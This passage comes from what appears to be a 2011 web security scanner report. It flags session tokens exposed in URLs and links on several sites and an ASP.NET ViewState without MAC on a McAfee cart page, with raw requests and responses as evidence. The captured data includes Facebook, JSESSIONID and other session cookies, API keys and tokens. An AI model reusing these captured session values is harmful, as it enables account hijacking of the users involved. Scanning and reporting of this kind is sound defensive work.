Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=177-9706368-2622212; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 411638


<html>
<head>


<style type="text/css"><!--


BODY
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_fa_dp_aDVQnb0M7T9S6?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&amp;location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fdp%2F0975264001%2Fref%3Dcm_sw_r_fa_dp_aDVQnb0M7T9S6%26bodytext%3DThe%2520Hedonist%253A%2520World%2520Vacation%2520Guide%2520by%2520Brett%2520Tate" target="_blank" class="tafSocialLink" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_dp_aDVQnb0M7T9S6?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fdp%2F0975264001%2Fref%3Dcm_sw_r_fa_dp_aDVQnb0M7T9S6%26bodytext%3DThe%2520Hedonist%253A%2520World%2520Vacation%2520Guide%2520by%2520Brett%2520Tate', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -18px 0px; height: 16px; width: 16px;;">
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_dp_aDVQnb0M7T9S6?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&amp;location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0975264001%252Fref%253Dcm_sw_r_tw_dp_aDVQnb0M7T9S6%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DThe%2520Hedonist%253A%2520World%2520Vacation%2520Guide%2520by%2520Brett%2520Tate%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fdp%2F0975264001%2Fref%3Dcm_sw_r_tw_dp_aDVQnb0M7T9S6%26count%3Dnone" target="_blank" class="tafSocialLink" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_dp_aDVQnb0M7T9S6?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0975264001%252Fref%253Dcm_sw_r_tw_dp_aDVQnb0M7T9S6%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DThe%2520Hedonist%253A%2520World%2520Vacation%2520Guide%2520by%2520Brett%2520Tate%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fdp%2F0975264001%2Fref%3Dcm_sw_r_tw_dp_aDVQnb0M7T9S6%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -34px 0px; height: 16px; width: 16px;;">
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1827BY2UKT0ZQ/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=8D0D078695A3751F014EB38018534998BE23FD97&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDk3NTI2NDAwMS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R1827BY2UKT0ZQ.2115.Helpful.Reviews&voteSessionID=177-9706368-2622212"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1827BY2UKT0ZQ/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=68C210B64381B8F21797058DFF903E77FC4865E8&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDk3NTI2NDAwMS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R1827BY2UKT0ZQ.2115.Helpful.Reviews&voteSessionID=177-9706368-2622212"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1827BY2UKT0ZQ/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=45DDDDEA0F6D248EDBB48E5A66D6BBDF70D309B0&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDk3NTI2NDAwMS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R1827BY2UKT0ZQ.2115.Inappropriate.Reviews&voteSessionID=177-9706368-2622212"
>Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R3EFITEKISH5O/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=75A3BD8AD998CB31E337FF93EF9CCF37E4B784C8&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDk3NTI2NDAwMS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R3EFITEKISH5O.2115.Helpful.Reviews&voteSessionID=177-9706368-2622212"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R3EFITEKISH5O/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=F09BAA8BE60C0E979C3B694D7F235E721428A4F3&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDk3NTI2NDAwMS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R3EFITEKISH5O.2115.Helpful.Reviews&voteSessionID=177-9706368-2622212"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R3EFITEKISH5O/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=94B0145DA5841383AE88248D6323F4C51C3987F5&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDk3NTI2NDAwMS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R3EFITEKISH5O.2115.Inappropriate.Reviews&voteSessionID=177-9706368-2622212"
>Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1IC0DFKZVM0CI/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=C25A422920C258E1A3AB45577532F512C44813C4&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDk3NTI2NDAwMS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R1IC0DFKZVM0CI.2115.Helpful.Reviews&voteSessionID=177-9706368-2622212"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1IC0DFKZVM0CI/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=6E3B9B58157E8207A1225D87F347305DDC0B9DAD&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDk3NTI2NDAwMS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R1IC0DFKZVM0CI.2115.Helpful.Reviews&voteSessionID=177-9706368-2622212"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1IC0DFKZVM0CI/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=C86EF159EDEE368158C3F3284BC995BD6F01D436&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDk3NTI2NDAwMS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R1IC0DFKZVM0CI.2115.Inappropriate.Reviews&voteSessionID=177-9706368-2622212"
>Report abuse</a>
...[SNIP]...
<div class="content">
If you are a publisher or author and hold the digital rights to a book, you can sell a digital version of it in our Kindle Store.
<a href="/gp/redirect.html/ref=dtp_dp_lm_0975264001/177-9706368-2622212?location=http://dtp.amazon.com/&amp;token=ED7546842AF86000862C6B4CDB683D114A0EDF07">Learn more</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/177-9706368-2622212?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/177-9706368-2622212?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/177-9706368-2622212?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/177-9706368-2622212?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a>
...[SNIP]...
9.13. http://www.dzone.com/links/add.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.dzone.com
Path:   /links/add.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /links/add.html HTTP/1.1
Host: www.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 17 Apr 2011 14:18:30 GMT
Server: Apache/2.2.11 (Unix) DAV/2 SVN/1.5.5 Resin/4.0.4 PHP/5.2.13
Cache-Control: private, max-age=1
Location: http://www.dzone.com/links/login.html;jsessionid=aaaFT2qK8l5LeghP70J9s
Content-Length: 108
Set-Cookie: JSESSIONID=aaaFT2qK8l5LeghP70J9s; path=/
Content-Type: text/html; charset=utf-8
Expires: Sun, 17 Apr 2011 14:18:31 GMT
Vary: Accept-Encoding,User-Agent
Connection: close

The URL has moved <a href="http://www.dzone.com/links/login.html;jsessionid=aaaFT2qK8l5LeghP70J9s">here</a>
9.14. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=4a27a904c492f128d46163d02575765c&app_id=4a27a904c492f128d46163d02575765c&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13c83bcec%26origin%3Dhttp%253A%252F%252Fwww.kaboodle.com%252Ff3e8866578%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3b69b11f%26origin%3Dhttp%253A%252F%252Fwww.kaboodle.com%252Ff3e8866578%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff901adcc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df55671958%26origin%3Dhttp%253A%252F%252Fwww.kaboodle.com%252Ff3e8866578%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff901adcc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d27c7a2c%26origin%3Dhttp%253A%252F%252Fwww.kaboodle.com%252Ff3e8866578%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff901adcc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df345055be%26origin%3Dhttp%253A%252F%252Fwww.kaboodle.com%252Ff3e8866578%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff901adcc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/za/additem?a5f9f=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/extern/login_status.php?api_key=4a27a904c492f128d46163d02575765c&app_id=4a27a904c492f128d46163d02575765c&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13c83bcec%26origin%3Dhttp%253A%252F%252Fwww.kaboodle.com%252Ff3e8866578%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3b69b11f%26origin%3Dhttp%253A%252F%252Fwww.kaboodle.com%252Ff3e8866578%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff901adcc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df55671958%26origin%3Dhttp%253A%252F%252Fwww.kaboodle.com%252Ff3e8866578%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff901adcc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d27c7a2c%26origin%3Dhttp%253A%252F%252Fwww.kaboodle.com%252Ff3e8866578%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff901adcc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df345055be%26origin%3Dhttp%253A%252F%252Fwww.kaboodle.com%252Ff3e8866578%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff901adcc&sdk=joey&session_version=3
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.54.35
X-Cnection: close
Date: Sun, 17 Apr 2011 14:24:11 GMT
Content-Length: 0

9.15. http://www.hldataprotection.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.hldataprotection.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: www.hldataprotection.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 17 Apr 2011 14:18:18 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
Last-Modified: Thu, 14 Apr 2011 06:21:56 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=i-15e5bf7e; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta ht
...[SNIP]...
<p>Senator Kerry offered this overview on <a href="http://kerry.senate.gov/work/issues/issue/?id=74638d00-002c-4f5e-9709-1cb51c6759e6&amp;CFID=74370047&amp;CFTOKEN=46575664">his web site</a>
...[SNIP]...
9.16. http://www.pages05.net/WTS/event.jpeg  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.pages05.net
Path:   /WTS/event.jpeg

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /WTS/event.jpeg?accesskey=7e29f616-12c999824aa-c6f842ded9e6d11c5ffebd715e129037&v=1.03&isNewSession=1&type=pageview&isNewVisitor=1&sessionGUID=20a481a9-716c-08d8-9179-6804e373028e&webSyncID=1b371563-da21-14c5-db4d-407b95beb159&url=http%3A%2F%2Fwww.dealer.com%2F&newSiteVisit=1&hostname=www.dealer.com&pathname=%2F&pagename=%2F&newPageVisit=1&requestGuid=12645631-b918-5e45-66bd-2a0d5760bd1e HTTP/1.1
Host: www.pages05.net
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 01:02:46 GMT
Server: Apache
Set-Cookie: JSESSIONID=B7AD23E107C3396C1AE21FEEE67146D9; Path=/
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, s-maxage=0
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 70
Connection: close
Content-Type: image/png
Set-Cookie: BIGipServerP5-LPAGES-RECP-8005=202340362.17695.0000; path=/

.PNG
.
...IHDR....................IDATx.c``...........}....IEND.B`.
9.17. http://www.webroot.com/En_US/about-press-room-in-the-news.html  previous

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.webroot.com
Path:   /En_US/about-press-room-in-the-news.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /En_US/about-press-room-in-the-news.html HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:11:46 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 57774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<he
...[SNIP]...
<p>
<a href="http://www.crn.com/security/222500159;jsessionid=LBRX4NVGHML15QE1GHRSKHWATMY32JVN?queryText=20+coolest+cloud+security" target="_blank">Read more</a> <a href="http://www.crn.com/security/222500159;jsessionid=LBRX4NVGHML15QE1GHRSKHWATMY32JVN?queryText=20+coolest+cloud+security" target="_blank"><img src="/shared/img_structure/new-window.gif" border="0" align="middle">
...[SNIP]...
10. ASP.NET ViewState without MAC enabled  previous

Summary

Severity:   Low
Confidence:   Certain
Host:   https://home.mcafee.com
Path:   /secure/cart/

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Request

GET /secure/cart/?offerId=285986&PkgQty=1 HTTP/1.1
Host: home.mcafee.com
Connection: keep-alive
Referer: http://promos.mcafee.com/offer.aspx?id=285986
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionInfo=AffiliateId=0; isvt_visitor=yNo98QoBC2cAABJDQT4AAAAAAB1JCVeen0VKRW; WT_FPC=id=20dc5aca13b81baa15d1303034109486:lv=1303034109486:ss=1303034109486; SiteID=1; SessionInfo=AffiliateId=0; HPrst=gu=122d9a9e-74f4-4d0e-85cf-3ecd0f120b8e&loc=EN-US; Currency=56; HRntm=aff=0-0&cur=56&lbu=http%3a%2f%2fhome.mcafee.com%2fdownloads%2ffree-virus-scan&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; s_cc=true; s_vi=[CS]v1|26D5719A051D00E9-600001368029DFAB[CE]; IS3_History=1302573891-1-74_3--1__3_; IS3_GSV=DPL-2_TES-1303044907_PCT-1303044907_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; s_nr=1303045175869-New; s_ev8=%5B%5B%27mcafee%27%2C%271303045175870%27%5D%5D; s_sq=mcafeecomglobal%3D%2526pid%253Dconsumer%25253Aen-us%25253Adirect-0-mcafee%25253Afree_services%25253Afreescan_scan_initiated%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bjavascript%25253Alocation.href%25253D%252522http%25253A//promos.mcafee.com/offer.aspx%25253Fid%25253D285986%252522%25253Bretu%2526oidt%253D2%2526ot%253DSUBMIT; foresee.alive=1303045176255; currentURL=blank; FSRCookie=isAlive=0||ForeseeLoyalty=1||previousURL=http%253A//home.mcafee.com/downloads/free-virus-scan; Locale=en%2Dus; lUsrCtxSession=%3CUserContext%3E%3CAffID%3E0%3C%2FAffID%3E%3CAffBuildID%3E0%3C%2FAffBuildID%3E%3C%2FUserContext%3E%0D%0A; AffID=0; langid=1; lBounceURL=http%3A%2F%2Fus%2Emcafee%2Ecom%2Froot%2Fbasket%2Easp%3Faffid%3D0%26langid%3D1; session%5Fdata=%3CSessionData%3E%0D%0A%09%3COrganicSearchtraffic%3E1%3C%2FOrganicSearchtraffic%3E%0D%0A%09%3Cwt%5Fsource%5Fcid%3E0%3C%2Fwt%5Fsource%5Fcid%3E%0D%0A%09%3Cwt%5Fdestination%5Fcid%3E0%3C%2Fwt%5Fdestination%5Fcid%3E%0D%0A%09%3Ctempfrlu%3E%3C%2Ftempfrlu%3E%0D%0A%3C%2FSessionData%3E%0D%0A

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e0%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e0%3c%2fwt_destination_cid%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:41 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Wed, 17-Apr-2041 12:59:41 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/secure/cart/?offerId=285986&PkgQty=1; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:41 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=122d9a9e-74f4-4d0e-85cf-3ecd0f120b8e&loc=EN-US; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:41 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f%3fofferId%3d285986%26PkgQty%3d1&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=720ea228faf811942ab0037780d0be935c4a4c55590b0216&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV10
X-UA-Compatible: IE=8
Date: Sun, 17 Apr 2011 12:59:41 GMT
Content-Length: 46143


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 